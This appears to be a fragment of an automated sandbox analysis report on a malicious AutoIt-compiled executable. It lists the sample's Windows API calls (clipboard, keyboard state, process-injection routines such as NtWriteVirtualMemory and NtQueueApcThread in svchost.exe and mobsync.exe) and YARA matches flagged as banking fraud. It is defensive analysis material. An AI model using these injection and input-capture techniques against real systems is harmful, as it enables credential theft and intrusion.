                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_00834164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00834164
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_00833F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00833F66
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_0082001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0082001C
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_0084CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0084CABC

                E-Banking Fraud

                Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: This is a third-party compiled AutoIt script. 0_2_007C3B3A
                Source: YH-3-12-2024-GDL Units - Projects.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_79dd580b-f
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_c3ba9192-e
                Source: YH-3-12-2024-GDL Units - Projects.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d8fb6644-9
                Source: YH-3-12-2024-GDL Units - Projects.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_208e341c-6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042C483 NtClose,1_2_0042C483
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72C70 NtFreeVirtualMemory,1_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E54650 NtSuspendThread,LdrInitializeThunk,3_2_04E54650
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E54340 NtSetContextThread,LdrInitializeThunk,3_2_04E54340
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04E52CA0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52C60 NtCreateKey,LdrInitializeThunk,3_2_04E52C60
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04E52C70
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04E52DF0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52DD0 NtDelayExecution,LdrInitializeThunk,3_2_04E52DD0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04E52D30
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04E52D10
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04E52EE0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52FE0 NtCreateFile,LdrInitializeThunk,3_2_04E52FE0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52FB0 NtResumeThread,LdrInitializeThunk,3_2_04E52FB0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52F30 NtCreateSection,LdrInitializeThunk,3_2_04E52F30
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52AF0 NtWriteFile,LdrInitializeThunk,3_2_04E52AF0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52AD0 NtReadFile,LdrInitializeThunk,3_2_04E52AD0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52B60 NtClose,LdrInitializeThunk,3_2_04E52B60
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E535C0 NtCreateMutant,LdrInitializeThunk,3_2_04E535C0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E539B0 NtGetContextThread,LdrInitializeThunk,3_2_04E539B0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52CF0 NtOpenProcess,3_2_04E52CF0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52CC0 NtQueryVirtualMemory,3_2_04E52CC0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52C00 NtQueryInformationProcess,3_2_04E52C00
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52DB0 NtEnumerateKey,3_2_04E52DB0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52D00 NtSetInformationFile,3_2_04E52D00
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52EA0 NtAdjustPrivilegesToken,3_2_04E52EA0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52E80 NtReadVirtualMemory,3_2_04E52E80
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52E30 NtWriteVirtualMemory,3_2_04E52E30
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52FA0 NtQuerySection,3_2_04E52FA0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52F90 NtProtectVirtualMemory,3_2_04E52F90
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52F60 NtCreateProcessEx,3_2_04E52F60
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52AB0 NtWaitForSingleObject,3_2_04E52AB0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52BE0 NtQueryValueKey,3_2_04E52BE0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52BF0 NtAllocateVirtualMemory,3_2_04E52BF0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52BA0 NtEnumerateValueKey,3_2_04E52BA0
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E52B80 NtQueryInformationFile,3_2_04E52B80
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E53090 NtSetValueKey,3_2_04E53090
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E53010 NtOpenDirectoryObject,3_2_04E53010
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E53D70 NtOpenThread,3_2_04E53D70
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_04E53D10 NtOpenProcessToken,3_2_04E53D10
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_02EA9270 NtReadFile,3_2_02EA9270
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_02EA9370 NtDeleteFile,3_2_02EA9370
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_02EA9100 NtCreateFile,3_2_02EA9100
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 3_2_02EA9410 NtClose,3_2_02EA9410
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_0082A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0082A1EF
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_00818310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00818310
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_008251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008251BD
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007ED975 0_2_007ED975
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007CFCE0 0_2_007CFCE0
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007E21C5 0_2_007E21C5
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007F62D2 0_2_007F62D2
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_008403DA 0_2_008403DA
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007F242E 0_2_007F242E
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007E25FA 0_2_007E25FA
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_0081E616 0_2_0081E616
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007D66E1 0_2_007D66E1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007CE6A0 0_2_007CE6A0
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007F878F 0_2_007F878F
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_00828889 0_2_00828889
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007F6844 0_2_007F6844
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007D8808 0_2_007D8808
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_00840857 0_2_00840857
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007ECB21 0_2_007ECB21
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007F6DB6 0_2_007F6DB6
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007D6F9E 0_2_007D6F9E
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007D3030 0_2_007D3030
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007EF1D9 0_2_007EF1D9
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007E3187 0_2_007E3187
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007C1287 0_2_007C1287
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007E1484 0_2_007E1484
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007D5520 0_2_007D5520
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007E7696 0_2_007E7696
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007D5760 0_2_007D5760
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007E1978 0_2_007E1978
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007F9AB5 0_2_007F9AB5
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_00847DDB 0_2_00847DDB
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007EBDA6 0_2_007EBDA6
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007E1D90 0_2_007E1D90
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007CDF00 0_2_007CDF00
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_007D3FE0 0_2_007D3FE0
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe Code function: 0_2_00F755A8 0_2_00F755A8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004183B3 1_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402929 1_2_00402929
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402930 1_2_00402930
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401200 1_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042EAA3 1_2_0042EAA3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FBF3 1_2_0040FBF3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402DF0 1_2_00402DF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040DDF3 1_2_0040DDF3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402590 1_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004165B3 1_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FE13 1_2_0040FE13
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040DF43 1_2_0040DF43
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040DF37 1_2_0040DF37
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E3F0 1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D003E6 1_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFA352 1_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC02C0 1_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF81CC 1_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF41A2 1_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D001AA 1_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC8158 1_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C30100 1_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDA118 1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3C7C0 1_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C64750 1_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40770 1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5C6E0 1_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D00591 1_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40535 1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEE4F6 1_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF2446 1_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE4420 1_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF6BD7 1_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFAB40 1_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3EA80 1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D0A9A6 1_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C56962 1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6E8F0 1_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C268B8 1_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4A840 1_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C42840 1_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C32FC8 1_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBEFA0 1_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB4F40 1_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C82F28 1_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C60F30 1_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE2F30 1_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFEEDB 1_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C52E90 1_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFCE93 1_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40E59 1_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFEE26 1_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3ADE0 1_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C58DBF 1_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4AD00 1_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDCD1F 1_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C30CF2 1_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0CB5 1_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40C00 1_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C8739A 1_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2D34C 1_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF132D 1_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5B2C0 1_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE12ED 1_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5D2F0 1_2_03C5D2F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C452A0 1_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4B1B0 1_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7516C 1_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2F172 1_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D0B16B 1_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEF0CC 1_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C470C0 1_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF70E9 1_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFF0E0 1_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFF7B0 1_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF16CC 1_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C85630 1_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D095C3 1_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDD5B0 1_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75711_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C314601_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF43F1_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
